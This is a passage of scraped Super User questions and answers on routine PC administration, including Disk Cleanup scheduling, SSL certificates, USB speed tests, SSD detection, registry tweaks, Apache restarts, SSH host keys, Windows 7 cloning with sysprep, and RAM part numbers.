16, 2015 at 20:55 answered Mar 13, 2015 at 18:38voorvoor3122 gold badges22 silver badges44 bronze badgesAdd a comment | 
how to set task scheduler to run disk cleanup and automatically respond to popup window using 'Enter' key
windows-7;windows-task-scheduler;windows-7;windows-task-scheduler
how to set task scheduler to run disk cleanup and automatically respond to popup window using 'Enter' key Ask Question
1 Open a command prompt in order to configure your 'cleanmgr' settings and enter: "cleanmgr /sageset:999" this will open a one-time settings window which will associate the '999' to the specific settings that you want the command to have You can choose any number you want from 0-65535. Check the combo box options that you want to implement for your customized disk cleanup operation. This will create a registry link and will save your settings for future use.The registry settings may take a few minutes to become active. A reboot will reload the registry for you with more assurance. Then open Task Scheduler and select "Create Basic Task" from the actions pane.Give the task a name such as "my_cleanup". Add a description if you want to.Select the trigger (when it will run) that you want. You can add multiple triggers after the task is created.Select "Start a program" in the action window.Enter 'cleanmgr' into the Program/Script textfield and 'sagerun:999' into the "Add arguments (optional)" textfield. The program will not need any user input when it runs because the settings are saved into the registry from when you ran the sageset argument.Further reading can be found at cleanmgr info and at this microsoft page.ShareImprove this answer Follow answered Mar 13, 2015 at 19:00Dean SpicerDean Spicer64111 gold badge55 silver badges1414 bronze badgesAdd a comment | 
One SSL Certificate Two Services
ssl;certificate;iis;ssl-certificate;ssl;certificate;iis;ssl-certificate
One SSL Certificate Two Services Ask Question
4 As long as the hostname is the same, there is no technical reason why you can't use the same certificate. However, there may be legal reasons -- some certificate issuers only license them for use on a single server. If it's two services on the same server it may be OK anyway, but you should carefully read the terms and conditions of your certificate issuer.ShareImprove this answer Follow answered Mar 13, 2015 at 18:14Mike ScottMike Scott4,41311 gold badge1717 silver badges1717 bronze badges1They would be on the same server. I just want to host my service (WCF RESTful API) on a non-standard port and keep it separated from the website itself. I couldn't quite tell if this was technically possible, so thanks for the insight! – JNYRangerMar 13, 2015 at 18:16Add a comment | ; 1 Yes. The certificate signs the public key of the server for a fully qualified domain name. The port is not part of it. You could even apply for a wildcard certificate for all hosts under a domain, i.e. *.domain.com.ShareImprove this answer Follow answered Mar 13, 2015 at 21:55bbaassssiieebbaassssiiee1,36511 gold badge1111 silver badges1717 bronze badgesAdd a comment | 
Test USB 3.0 Device Speed
linux;ubuntu;bash;dd;usb-3;linux;ubuntu;bash;dd;usb-3
Test USB 3.0 Device Speed Ask Question
1 First that is only 100MB that you are writing. The disk and controller also have a cache that you aren't dropping, so you need a bigger test to make sure those caches aren't corrupting the results. Bump that up at least 1GB. Maybe by changing to bs=1M. I normally test with 10GB just to be sure.Then you need to make sure the data actually gets to disk, add "conv=fdatasync" at the end of the first line to do that.As to normal speeds, USB2 devices / ports normally do between 10 and 20 MB/sec. USB3 devices should be between 50 and 150MB/sec. I'm very happy if I see a new device hit 120MB/sec. That's 7.2GB/min which is really fast.But be aware a rotating disk reads/writes at the speed the platter spins under the head. Thus it you know the density (bits/inch) you can calculate the data speed:throughput = radius * 2PI * density * RPMThe density you can't really control, but the RPM you can, the more RPMs the faster the raw speed.Also, note that the radius of the platter changes based on where the head is. It might be about 1.75 inches on the outer track, but only 0.75 inches on the inner track. That means the drive will really slow down as you move from the outer track to the inner. Virgin drives typically have you writing to the outer track first, so you get much better speed at first. As the drive fills up it gets slower. I routinely see a 50% drop off in performance with a almost full drive.ShareImprove this answer Follow answered Mar 13, 2015 at 22:30user427539user4275391111 bronze badge4Is there a way to safely clear the controller cache? I'm actually testing with a USB flash stick. Is there a way to test a small one with, say, only 512 MB capacity ? – tmpMar 16, 2015 at 16:00Well, you can be assured assured that a cold boot will have empty cache unless you have batteries in you case. (Some raid controllers really do have their own batteries). For the thumb drive, pulling it and reinserting is the only way I know to clear the cache.Seriously, those are the only 2 ways I know. – user427539Mar 17, 2015 at 19:49RE: your new speeds. Thumb drives are very low cost devices. I've never benchmarked them, but I doubt your speeds are way off of reality. The devices are probably just slow. Benchmark an external USB3 rotating disk and you should see better speeds. – user427539Mar 17, 2015 at 19:55sync before and after test command should give better results, still conv=fdatasync is good. – pbiesDec 28, 2018 at 8:07Add a comment | 
How do I determine whether a drive is an HDD or SSD in Windows 8?
windows-8;hard-drive;ssd;windows-8;hard-drive;ssd
How do I determine whether a drive is an HDD or SSD in Windows 8? Ask Question
86 Actually, there's a much simpler solution.Windows Drive Optimizer (formerly Disk Defragmenter) reports whether a drive is an HDD or SSD. You can access this utility by pressing Windows+S, searching for "optimize", and selecting Defragment and optimize your drives.This will generally work in any system where the disks are not plugged into a RAID card. However, if the OS cannot determine the media type (e.g. the drives are in a hardware RAID), the above solution won't work, although a program such as CrystalDiskInfo may still be able to help. If you still can't tell whether the drive(s) is an HDD or SSD, you may need to open the computer case and examine the actual drive(s).Alternatively, you can use the PowerShell Get-PhysicalDisk cmdlet. Here's what it looks like on my custom desktop:PS C:\Windows\system32> Get-PhysicalDisk | select FriendlyName,BusType,MediaTypeFriendlyName BusType MediaType------------ ------- ---------NVMe Samsung SSD 960 NVMe SSDSanDisk SDSSDH31024G SATA SSDShareImprove this answer Follow edited Nov 4, 2017 at 23:45 answered Nov 16, 2014 at 7:47bwDracobwDraco45.3k4343 gold badges163163 silver badges202202 bronze badges5@JakeGould If the default defragmenter isn't disabled or replaced by other defragmenter. ;-) – Little HelperNov 16, 2014 at 8:47Nice! Many systems combine a small SSD with a large HDD and this really clarifies what drive is being used for what. Much better answer than using the Device Manager and googling. – JasonNov 17, 2014 at 6:10Note: If you have One Note 2013 installed, Win + S starts a new screen capture. – James MertzNov 17, 2014 at 22:45@KronoS I was going to edit the answer for this, but apparently it only applies to OneNote without the current updates. – JasonNov 19, 2014 at 16:41Win10 (for me) built in defragger says "Fixed Hard Drive" for the Media Type. What is that, just non-removable? How do I know if there's a rotating disc in it or not? – tgm1024--Monica was mistreatedJan 25, 2019 at 14:33Add a comment | ; 43 Run Device Manager (devmgmt.msc), expand "Disk drives" node, see the model number of your drive, and search for it online.ShareImprove this answer Follow answered Nov 15, 2014 at 8:25JonathanJonathan3,35455 gold badges2525 silver badges3333 bronze badges9Or do the same from the BIOS. :) – HennesNov 15, 2014 at 10:0820@Hennes Or look inside the computer ;p – Louis WaweruNov 15, 2014 at 10:254Best and probably least invasive solution. +1 – WingbladeNov 15, 2014 at 14:331@Louis Wouldn't work if its a remove computer (ie my work computer). – David says Reinstate MonicaNov 16, 2014 at 2:323+1 the accepted answer doesn't work on Windows 7, this does – Matt FrearApr 15, 2015 at 10:22 | Show 4 more comments; 17 Just because it hasn't been mentioned yet, Speccy is great for seeing in depth information about every component in your computer, including your hard drive.ShareImprove this answer Follow answered Nov 17, 2014 at 10:04JMKJMK3,25099 gold badges4747 silver badges6969 bronze badgesAdd a comment | 
Cannot format my USB which is write protected in Windows 7
windows-explorer;windows-explorer
Cannot format my USB which is write protected in Windows 7 Ask Question
0 Try this:step 1:go to this directory HKEY_LOCAL_MACHINE\SYSTEM\Currentcontrolset\control\again and right click control folderstep 2:select new, then click key and rename the new key #1 folder intoStorageDevicePoliciesstep 3:right click StorageDevicePolicies folder and select new DWORD(32-bit) Valuefor 32-bit Operating System and select new DWORD(64-bit) Valuefor 64-bit Operating Systemstep 4:rename dword newer folder into WriteProtect, then double click WriteProtectand change the value data into 0 with hexadecimal base, Then close regeditstep 5:open my computer and refresh it 5 times without do anything to your usb, andproperly eject your flash drivestep 6:plug in your usb again into your computer and format it using exfat instead of fat32 ShareImprove this answer Follow answered Nov 15, 2014 at 8:00Leo ChapiroLeo Chapiro15.4k55 gold badges4242 silver badges4545 bronze badges1Why do you have to refresh five times? That sounds almost like Voodoo. Then again this is Windows... – FlorisNov 16, 2014 at 21:41Add a comment | 
What information can my ISP see from my router?
router;ip;isp;wan;router;ip;isp;wan
What information can my ISP see from my router? Ask Question
2 I know they log the WAN MAC address and can figure out the manufacturer with the OUI, what about the router host name and other MAC addresses like the LAN and wireless MAC?The short answer: Depends on the ISP. In general ISP’s mainly track your usage and habits. This article on Lifehacker gives a good overview on that type of tracking that can be done on your usage without going past the WAN connection.But as far as breaching past the WAN connection and into your LAN? Well, in general one should assume their ISP is operating within basic common carrier rights & privileges. Meaning they just won’t probe your internal router info. Which they honestly can’t if you are using a store bought router hooked up to their network.The if comes from users who use ISP provided equipment; such as combo modems/routers. If it’s the ISP’s equipment you need to assume they are retaining some root level control on the device so they can handle remote firmware upgrades.Here in NYC I seem to recall Verizon bricking tons of modems with a badly deployed firmware push about 10 years ago. I did dig up this article on how Comcast pushes (or pushed?) firmware updates. And I found this article on how British Telecom’s router firmware seems to setup management IP address explicitly for “firmware” updates, but then again who knows how much access they have with that level access.Robert Graham of security firm Errata said that many Internet service providers make custom firmware for the modems they sell, and this typically has a management "back-door" so that the ISP can monitor or control the modem.So if you are truly worried about an ISP provided piece of equipment going past the WAN and into your network, then I would recommend seeing if that ISP device can be made to behave like a modem in “bridge mode” and then purchasing another router that would connect to that modem and handle all routing. That way all of you network’s “heavy lifting” happens on equipment you have purchased and you control.ShareImprove this answer Follow edited Nov 15, 2014 at 15:56 answered Nov 15, 2014 at 7:39Giacomo1968Giacomo196851.5k1818 gold badges161161 silver badges205205 bronze badges21Verizon FIOS uses the router they supply to control all of their services. Each set-top box and DVR is basically a networked computer. I was a little surprised to find out that they had access to my home computer network. They knew every printer and PC name. No need to worry about the NSA hacking your system. Verizon is already inside. – fixer1234Nov 15, 2014 at 7:50@fixer1234 Ahh! That Verizon! Thanks for the info. – Giacomo1968Nov 15, 2014 at 7:51Add a comment | 
Set the "open command window here" title as the directory it was invoked from
windows;command-line;batch-file;title;windows;command-line;batch-file;title
Set the "open command window here" title as the directory it was invoked from Ask Question
3 I'd try the following line:for %a in (.) do title %~naOr in a batch file you'd escape the %s once:for %%a in (.) do title %%~naThe for...do loop is just there to get the current path into the variable since you can't use the ~ operator with environment variables like (%cd%).However, as you noticed, this won't work for the "Command Prompt here", since this is executed before the directory is set.To circumvent this, you'll essentially have to modify the command line being called whenever you use this functionality.This is controlled by two variables in the Registry, both being sub keys of HKEY_CLASSES_ROOT\Directory:HKEY_CLASSES_ROOT\Directory\shell\cmd\command: This key defines the command to be run when you Shift + rightclick a directory/folder icon.HKEY_CLASSES_ROOT\Directory\Background\shell\cmd\command: This key defines the command to be run when you shift + rightclick somewhere in an open Explorer window.By default, both of these default values are set to cmd.exe /s /k pushd "%V", which will open a command window and change directory to the parameter passed as %V.So for this to work, you'll have to edit those two default values and append the command from above, slightly modified. Simply set both default values to this:cmd.exe /s /k "pushd ""%V"" && for %%A in (%V) do @title %%~nA"Note the double quotes to properly escape them, since everything is enclosed in a single pair of quotes to group everything for cmd.exe's /k parameter. The @ in there will hide the command from showing inside the command window.This works for me, but there's one little quirks involved: If your directory name contains more than one dot, like one.two.three, this will name the title one.two only.Also keep in mind that the title will not update when you CD to another directory. Getting this to work would be quite a bit more trickier (or maybe even impossible; didn't try).ShareImprove this answer Follow edited Nov 17, 2014 at 8:47 answered Nov 17, 2014 at 8:30MarioMario4,25622 gold badges2020 silver badges2222 bronze badges14Thank you!!! Two things: In my case it was HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\background\shell\cmd\command. And: It ignores spaces (It gives title "Folder" for "New Folder") – laggingreflexNov 17, 2014 at 9:00@laggingreflex: That's essentially the same path. HKCR is just a "shortcut". :) As for ignoring spaces: Yes, that's probably some leftover from old DOS times (as is the limitation to one dot). – MarioNov 17, 2014 at 9:04Hmm. I tried it and it didn't work. Then I searched regedit for "cmd.exe /s /k pushd "%V"" and found a couple of entires, some of which I was unable to edit (some error). That was the one I finally edited and it worked. Maybe it's only for my case, I do have some setting enabled so I don't have to hold shift to get the "open command window". – laggingreflexNov 17, 2014 at 9:07To avoid having to hit the shift key, just go to the paths described in my answer and remove the Extended value under the cmd keys. Although it's indeed possible some other tool edited permissions and such to avoid further modifications/resets. – MarioNov 17, 2014 at 9:15It is not only your case, special folders like Desktop etc. are handled by other keys in registry. And there's no need to use for command, cmd.exe /s /k "pushd ""%V"" & title %V" is enough. See this question: superuser.com/questions/414155/… (Earlier when writing my answer to your question I forgot that the question was already answered somwhere else) – MBuNov 17, 2014 at 9:19 | Show 9 more comments; 1 Inspired by the question, I have added some fun functionality to the command line on my Windows: pseudocommands cdn, pushdn and popdn (trailing N = acronymous new or naming or even nonsens or whatever else) corresponding to cd, pushd and popd commands. Those pseudocommands help to keep my cmd window title parallel to the cmd current directory path as follows: current directory window title------------------ --------------X:\subpath\subfold X:\ ..\subfold X:\folder X:\folderX:\ X:\for any drive X: and arbitrary depth of subpath. Code example: cdn.bat placed to any folder explicit in the path environment variable.@rem cdn.bat@rem change directory (and drive) || abort script processing in case of bad success@cd /D %* || @goto :eof@rem eliminate (if any in %*) trailing backslashes, surrouding double-quotes@rem and/or (combined) symbols to current, parent or root directory (., .., \)@call :window_title "%CD%"@rem or, to title window to bare folder name, use: @rem @for /F "tokens=*" %%G in ("%CD%") do @title %%~nG%%~xG@goto :eof:window_title @if "%~p1%~n1%~x1" == "\%~n1%~x1" ( @rem window title to 'X:\folder' on highest-level path or to 'X:\' on drive root @title %~d1%~p1%~n1%~x1 ) else ( @rem window title to 'X:\...\folder' otherwise (i.e. nor root, nor highest-level) @title %~d1^\ ..^\%~n1%~x1 ) @exit /BPleasure sharing my delight.ShareImprove this answer Follow answered Nov 21, 2014 at 18:59JosefZJosefZ12.4k55 gold badges3636 silver badges6767 bronze badgesAdd a comment | ; 0 This is now possible to keep up to date automatically after any command, without redefining 'cd' etc. See Change command prompt to only show current directory nameShareImprove this answer Follow answered Oct 9, 2018 at 22:20mike_nmike_n12Welcome to Super User! As with your other answer (identical to this one), it would be preferable to include the essential parts of the answer here, and provide the link for reference. – bertiebOct 9, 2018 at 22:42Also, the linked post was deleted, so this link points nowhere. – fixer1234Oct 10, 2018 at 6:50Add a comment | 
How would I restart Apache using the Terminal in Mac OS X?
macos;terminal.app;macos;terminal.app
How would I restart Apache using the Terminal in Mac OS X? Ask Question
24 Since Apache runs on a reserved port (80) that is considered a sensitive system level port you would have to run apachectl restart via sudo like this:sudo apachectl -k restartAfter typing that in it will as you for your password. Assuming you have admin privileges, just type in the password and Apache should restart. Other commands include start and stop that can be run like this to start Apache:sudo apachectl -k startAnd like this to stop Apache:sudo apachectl -k stopAlso, if you just type in apachectl without anything you will receive a list of options and directives you can use with the apachectl command; this is my output from Mac OS X 10.9.5:Usage: /usr/sbin/httpd [-D name] [-d directory] [-f file] [-C "directive"] [-c "directive"] [-k start|restart|graceful|graceful-stop|stop] [-v] [-V] [-h] [-l] [-L] [-t] [-T] [-S]Options: -D name : define a name for use in <IfDefine name> directives -d directory : specify an alternate initial ServerRoot -f file : specify an alternate ServerConfigFile -C "directive": process directive before reading config files -c "directive": process directive after reading config files -e level : show startup errors of level (see LogLevel) -E file : log startup errors to file -v : show version number -V : show compile settings -h : list available command line options (this page) -l : list compiled in modules -L : list available configuration directives -t -D DUMP_VHOSTS : show parsed settings (currently only vhost settings) -S : a synonym for -t -D DUMP_VHOSTS -t -D DUMP_MODULES : show all loaded modules -M : a synonym for -t -D DUMP_MODULES -t : run syntax check for config files -T : start without DocumentRoot(s) checkShareImprove this answer Follow edited Oct 18, 2015 at 22:28 answered Nov 15, 2014 at 7:18Giacomo1968Giacomo196851.5k1818 gold badges161161 silver badges205205 bronze badges0Add a comment | 
Current Time Machine HDD bad sectors - Clone to new HDD or do new clean TM backup to new HDD?
permissions;osx-snow-leopard;time-machine;clone;hard-drive-failure;permissions;osx-snow-leopard;time-machine;clone;hard-drive-failure
Current Time Machine HDD bad sectors - Clone to new HDD or do new clean TM backup to new HDD? Ask Question
1 If the question is whether you should trust the current TimeMachine backup or not, I don’t believe 5 bad sectors is anything to panic about… Yet… It means the drive is slowly dying but is in decent shape now. Whether those 5 bad sectors have data or not is unclear, but I would recommend you do the following.You say this:My new Time Machine HDD is currently in external bay. Plan to replace "failing" HDD with new one - internal on Mac Pro, once I decide how to proceed.If one drive is connected in an external bay, and the other is set internally, I would download a tool like Carbon Copy Cloner and do a clone of the current TimeMachine drive to the new drive. And then when that is done, swap out the old drive for the newly cloned copy.If somehow that fails due to the bad sector issue, then you can just swap out the failing drive for the new drive and start anew. But by attempting to make a clone of the drive with Carbon Copy Cloner you will at least have a fighting chance to restore your already established TimeMachine setup.ShareImprove this answer Follow answered Nov 15, 2014 at 6:48Giacomo1968Giacomo196851.5k1818 gold badges161161 silver badges205205 bronze badges1Thanks, Jake: Do you think that Carbon Copy Cloner will "refuse" to clone if there are issues with current data on old Time Machine drive? You can verify data if you sync with Chronosync; but is it better to clone Time Machine drive? (in which case I would use CCC) – BarbaraNov 19, 2014 at 9:42Add a comment | ; 0 We use a product named Scannerz (http://scsc-online.com/Scannerz.html) to do testing. The nice thing about it is it can do other system tests like cable checks, sector checks, system checks, etc. and it can detect degradation SMART testing misses. It checks SMART status but doesn't alarm you when trivial events occur, whereas most SMART testing software tends to over-alarm people, especially SSD users, when a sector remap occurs.A 5 sector remap on a drive with 3TB of data is peanuts. A typical HD crash will often yield gigabytes of bad data on an HDD. The trouble with SMART testing is that it only detects problems after an attempted write operation fails. This is why we use Scannerz. It scans the entire drive, even if an attempt to write to it has never been made. If you have a true and serious head crash or the drive is truly failing, you'll know. It scans the media only and pays no attention to whether or not the system ever tried to write to the drive. It is not a repair tool. True repair tools don't exist for hard drives. The disk controller controls everything. The only real way to properly re-map bad sectors is to zero the drive (as you've done) and if it fails, forget it, because it means all the spare sectors are used up.If you zeroed the drive and Disk Utility succeeded, then the problems probably aren't that severe. If you attempt to clone the drive using CCC and there are bad data blocks that actually contain data, CCC should flag them. CCC is only going to copy over blocks that are in use, not blocks that have never been used or that contain deleted files.If the damage is truly limited to 5 sectors, especially on a drive that size, I don't know if it's really anything to worry about.ShareImprove this answer Follow answered Dec 8, 2014 at 10:54BSD GuyBSD Guy2111 bronze badgeAdd a comment | 
Issues using scp to copy a file in Unix
ssh;unix;shell-script;scp;ksh;ssh;unix;shell-script;scp;ksh
Issues using scp to copy a file in Unix Ask Question
1 Host key verification failed.That usually means that your local SSH config has no idea who the host is and needs to have that host added to the list of known hosts in the RSA SSH list. The easiest way to fix it is to just SSH in manually like this:ssh username@hostnameYou will get a message like this; all addresses used here are examples only of course:The authenticity of host 'hostname (123.456.789.0)' can't be established.RSA key fingerprint is aa:bb:cc:dd:ee:ff:gg:hh:ii:jj:kk:ll:mm:nn:00:11.Are you sure you want to continue connecting (yes/no)?Just type in yes and then you will get this message followed by a password prompt:Warning: Permanently added 'hostname,123.456.789.0' (RSA) to the list of known hosts.And now the host hostname is added to the list of known hosts on your RSA chain. So now when you run the scp command all should work as expected. This is strictly a one-time action that you need to do on any host you plan on connecting to hostname. After that, the “Host key verification failed.” error will not come up again.ShareImprove this answer Follow edited Nov 15, 2014 at 7:24 answered Nov 15, 2014 at 6:30Giacomo1968Giacomo196851.5k1818 gold badges161161 silver badges205205 bronze badgesAdd a comment | 
Specifying start time and end time of the section of the video to be cut in Camtasia
windows-7;camtasia;windows-7;camtasia
Specifying start time and end time of the section of the video to be cut in Camtasia Ask Question
0 There is no way to specify the start time and end time of the section of the video to be cut in Camtasia 8.3, instead of having to manual move the green and red sliders.ShareImprove this answer Follow answered Apr 6, 2015 at 18:51Franck DernoncourtFranck Dernoncourt19.3k4444 gold badges172172 silver badges293293 bronze badgesAdd a comment | 
Trouble cloning Windows 7 Pro 64-bit to new, different hardware
windows-7;windows-7
Trouble cloning Windows 7 Pro 64-bit to new, different hardware Ask Question
4 Windows gets a BSOD, probably because the installed drivers are not compatible is correct. The OS is assuming other hardware is present and trying to use the current as it would the previous which, especially if the boards were different, cause it to BSOD.I would recommend taking a backup of the machine first if you havent already but if you are moving to another system with different hardware you are looking at an imaging solution or something similar. One of the things that you could use, which is already on the computer, is sysprep. Typically located in C:\Windows\System32\sysprep one of its usable features is to force the computer to reinstall its drivers and remove unique details of the system for redeployment. It is typically used in an office environment for deploying golden images to a variety of computer makes/models. After closing all running software you could run a command like this on your computer. BACKUP COMPUTER BEFORE YOU DO THISsysprep /generalize /oobe /shutdownAfter the computer is shut down clone it in that state. On the new machine the computer will reconfigure itself as best it can on the new hardware. More than likely you will need to install your own drivers but it should work. Also this will force you to register windows again which, again, should work. More information on sysprep that would be way too much to include in this post can be found here. It is first and foremost part of a mass imaging deployment collection of tools but I think it would get the job done. One more thing: I can't find a reference for it but dont sysprep a machine multiple times. After the 3rd time you will have errors when the computer boots. If your sysprep fails restore from a previous clone that I recommended you to do. Other solutions could include utilities like Acronis however I have not used any personally. ShareImprove this answer Follow edited Nov 15, 2014 at 6:17 answered Nov 15, 2014 at 6:09MattMatt1,18622 gold badges99 silver badges1919 bronze badges1Thanks! I did not mark as answer because I ended up taking a differnent approach based on where I was with my image and concerns about running sysprep on a machine that I wanted to keep in service. Please see my reply below. – BillNov 16, 2014 at 14:10Add a comment | ; 3 Sysprep is the best way to do this but can be long-winded and a little difficult - A method I would try is on the new computer keep pressing F8 as it boots and select 'Disable automatic reboot' - When the blue screen appears rather than restart the computer will stop and display the error code and a message. This code is the only clue you are given as to why it won't boot.One of the most popular causes of the blue screen during this procedure is stop 0x00000007B (only the last two digits are relevant) which is the SATA Hard disk drivers - If the code is this then change the SATA settings in the bios from IDE/Compatible to AHCI then restart. If no joy then on the old machine use 'Windows Easy Transfer' to migrate all the settings and configuration from the old machine to the new - with the new machine having a fresh copy of Windows 7 64 bit which you have pre-confgured, but not installed the key.Once you have used the key on the new machine windows should request that you call an automated key hotline which will then issue you a key for the new computer whilst invalidating the old.If the old machine is intel and the new is AMD, then the only methods you can use successfully are Sysprep and Windows Easy Transfer.ShareImprove this answer Follow answered Nov 15, 2014 at 8:02JohnnyVegasJohnnyVegas3,45011 gold badge1313 silver badges1717 bronze badges1My error code was stop 0x00000007B, but I checked the BIOS, and it was already set to AHCI, so this did not help me. Thank you for the tip, but I ended up using a different approach, which I described above. – BillNov 16, 2014 at 14:08Add a comment | ; 0 This tutorial is excellent:http://www.sevenforums.com/tutorials/135077-windows-7-installation-transfer-new-computer.htmlHowever, I had already imaged my drive, so I looked into Acronis TI Universal Restore. It was not without issues - including the somewhat expected hunting for motherboard and hard disk drivers (which I thought would have been found on a standard Windows installation disk below Windows/inf - but which was not). In any case, using a combination of Aronis Universal Restore followed by a sysprep on the new system seems to have done the job. Even sysprep had issues however, and I needed to reboot to Safe Mode and then reboot to normal mode at one point (as described in the above tutorial) in order to get out of some endless reboot loop while setting up the devices. Very strange.In the end, sysprep did not let me / force me to re-activate my copy, so now I am concerned that I was not able to properly re-activate my new license, and I don't know how to trigger it to let me do so. I want to keep the old machine as a backup machine, but now I have two machines running off one Windows license.Finally, I preferred the above method over starting over with one of the direct methods in the tutorial (and as suggested by Matt above) because - while it also saved me the time of re-cloning my image - I also did not like the idea of running sysprep on the original machine, and needing to re config personal preferences and handle possible errors. Also, Acronis states that sysprep may not work because issues with the hardware abstraction layer (HAL) setting and other low level issues may not get addressed. I think I may have run into that issue given the manual driver supplementation I needed to to - but I can't be sure, perhaps Windows setup would have handled it.The rebooting into Safe Mode tip in the tutorial in order to get sysprep unstuck saved me bigtime!ShareImprove this answer Follow answered Nov 16, 2014 at 14:15BillBill14911 silver badge44 bronze badgesAdd a comment | ; 0 If you're getting the 0000007B BSOD (related to SATA) then here is my working solution (IF your old machine is still bootable and not dead or dismantled).I didn't fancy using sysprep and making a mincemeal of the user profiles. I also had tried Acronis True Image 2016 to no avail. Universal Restore didn't work in my unique case because the two platforms are drastically different (see below). Many generations of hardware apart, as well as old on IDE SATA and new on AHCI SATA. However, I tried something and it did work in the end so here it is.As somebody mentioned above, it's usually 99.9% always related to the SATA drivers. This repair is a twist on guides I've seen when you want to change your BIOS settings from IDE to AHCI but you get the BSOD so you need to 'force' a SATA driver change in Windows before restarting with the BIOS change to AHCI.Old comp - Core 2 Duo / Intel G35 Chipset / SATA in IDE/Ultra mode / Win764bitNew comp - Core i5 3rd Gen / Intel Z77 Chipset / Sata in AHCI modeFirstly I did a quick bum install of Win7 on the new board with a few drivers, and what I found out to be probably the latest non problematic Intel RST setup that works on the 2nd/3rd gen Intel Z77 boards (12.9.0.1001). You can even use an older one, it won't matter because once you're successfully booted into your Windows on your new comp, you can install up the latest Intel RST that your platform supports. I also downloaded the F6 Floppy drivers related to this version off the Intel Download site. I then went into Device Manager and confirmed the exact AHCI driver to be the Intel 7 Series/C216 SATA AHCI Controller.Then, I went back to the old computer, selected the current SATA driver in Device Manager (Intel ICH10 Ultra ATA Sata Controller, or something similar). I right clicked, and did a forceful driver update using the Have Disk option. I navigated to a pendrive holding the F6 Floppy drivers (downloaded in above step), and selected the exact driver as above - the Intel 7 Series/C216 AHCI Controller, in the list. It says driver incompatible but just force the update. When it asks to restart, don't restart. CLose all boxes. Shut down the computer.Take the drive out (in my case the system SSD), stick it into the new computer and boot, and viola, you'll be back into your original Windows 7 installation. Uninstall old drivers (you can even do this on your old machine before commencing any of the SATA driver forced install), install up your new mobo drivers and you're good to go.Hope this helps anyone with the 00000007B BSOD. All that's required is that you need to be able to see what SATA AHCI driver you have on your new platform you're trying to clone to. You can just do a quick barebone Win7 install on it like I did on a blank drive. Once you know exactly what the new platform requires, then the rest is a piece of cake. And you also are required to be able to still boot up off your old clone so this will only work if your old machine isn't mutilated or dead.Hope this helps! This IS the solution to that BSOD so even if your old machine is dead, you should be able to boot your clone on a motherboard or machine that is the same generation of your duff machine, and the same SATA setting you had in the previous BIOS (IDE or AHCI). You just need to be able to boot into your clone to forcefully change the SATA driver to the newer one that matches your newer computer.ShareImprove this answer Follow answered Jan 9, 2017 at 9:15NimeshNimesh1Add a comment | 
Are there disadvantages to big memory in upgrades?
memory;cpu;memory;cpu
Are there disadvantages to big memory in upgrades? Ask Question
1 I hesitate to choose whether 8GB memory or 16GB memory? So what is the disadvantage of big memory?The only real “disadvantage” to a 16GB upgrade versus 8GB upgrade is cost. If cost is not factor, getting as much RAM as your system can handle is always a good thing.That said, physical installing RAM is one factor in performance improvement. The other is making sure your system can really handle that RAM. Meaning, you can have 16GB installed on your system, but if the application you are using is not properly configured to use the 16GB of RAM you might as well not have an upgrade.Also, you state you are doing big data analysis: How? If there are file system interactions at play, maybe upgrading the storage to SSD (assuming you don’t already have that installed) could be another way to improve overall system performance.ShareImprove this answer Follow edited Nov 15, 2014 at 6:01 answered Nov 15, 2014 at 5:53Giacomo1968Giacomo196851.5k1818 gold badges161161 silver badges205205 bronze badges0Add a comment | ; 0 There is a disk space cost to consider if you are low on storage. If you let your laptop hibernate, the hibernation file will grow as it needs to store the state of your RAM, which is volatile. I assume the size of this file is equal to the size of your RAM.If you let Windows manage your pagefile, it may increase the size of the file to closer match the size of your physical memory.In such a case, going from 4 GB of RAM to 16 GB may make it seem like you lost 24 GB of disk space.But I don't see this as a disadvantage. Just too long for a comment.Given the choice, always choose more RAM.ShareImprove this answer Follow edited Mar 20, 2017 at 10:17CommunityBot1 answered Nov 15, 2014 at 6:02Louis WaweruLouis Waweru23.5k3737 gold badges128128 silver badges196196 bronze badgesAdd a comment | 
RAM Part Numbers - Meaning?
memory;memory
RAM Part Numbers - Meaning? Ask Question
19 Did you try to Google for 'Samsung RAM part number'. The first hit (on my search) lead me to this site (archive), which exactly answers your question. Here is a picture of what's there:But, as stated by @user2196728 in the comments, part numbers are not the numbers you need to worry about when you're replacing the RAM. The following spec's must be the same for the RAM to work:memory type (in your case: DDR3 SDRAM)memory speed (in your case: PC-10600, or 1333MHz - see a nice table on Wikipedia how those numbers are linked).In order to make optimal use of dual channel (generally, it helps a bit) the following specs should be the same:chip timings and CAS latency (in your case: CL9)memory size (in your case: 2 GB).When you replace all your memory or you buy a new computer, it is cost efficient to buy a pair of chips from the same manufacturer.ShareImprove this answer Follow edited Sep 17, 2020 at 11:43user132671,35377 gold badges2222 silver badges5050 bronze badges answered Aug 24, 2014 at 22:11agtoeveragtoever6,20411 gold badge2323 silver badges3737 bronze badges2Technically this answers the question, although I've discovered its not the thing I should be trying to understand. I'm replacing a RAM stick and thought the part number had meanings relevant to it's replacement. – 1UpAug 24, 2014 at 22:13a backup of the non functioning link: web.archive.org/web/20150512051739/http://www.samsung.com/… – user13267Sep 17, 2020 at 5:46Add a comment | ; 4 1051 and 1110 are the time codes when the chips were made: 1051 = week 51 of 2010; 1110 = week 10 of 2011. The format is usually YYWW, where YY is the year and WW is the week within the year.ShareImprove this answer Follow answered Mar 4, 2016 at 3:26Styevko AttilaStyevko Attila4111 bronze badgeAdd a comment | ; 2 Just meeting specs does not mean the RAM will work in your computer. Samsung RAM is used in many HP desktops. Some older HP computers are strict on RAM. They have to have Low density chips on the boards. So, even though you match all the specs, but insert High density RAM on the HP boards, it won't work, you'll just hear beeps.ShareImprove this answer Follow edited Jun 21, 2015 at 3:50G-Man Says 'Reinstate Monica'7,5572222 gold badges3939 silver badges8585 bronze badges answered Jun 21, 2015 at 3:24JDFJDF2111 bronze badgeAdd a comment | ; 1 A part number is an identifier of a particular part design used in a particular industry.Every constructors have its own part number for its product.More infos hereIn your case, where you want to replace a faulty RAM stick, the part number is not important.The most important things to consider are technical specs : Speed, Frequency, Type etc...Find a RAM stick with required technical specs, regardless any part number.ShareImprove this answer Follow edited Aug 24, 2014 at 22:37 answered Aug 24, 2014 at 22:16user2196728user21967281,27688 silver badges1010 bronze badgesAdd a comment | ; 1 It gets complicated. For maximum compatibility, matching the manufacturer and complete part number (except for the date code) is the easiest way to go without having to think.But that might lock you into a more expensive part when another one should be compatible too. So for maximum flexibility, or to optimize perofrmance, you have to understand and match a number of variables.First there are the DDR generations (DDR-DDR4) they are not even physically compatible, so you jsut have to look up what your PCU/Motherbaord expect.Let's focus on DDR3 now, to look at some of the more subtle compatibility issues.We'll start with functional compatability (get these 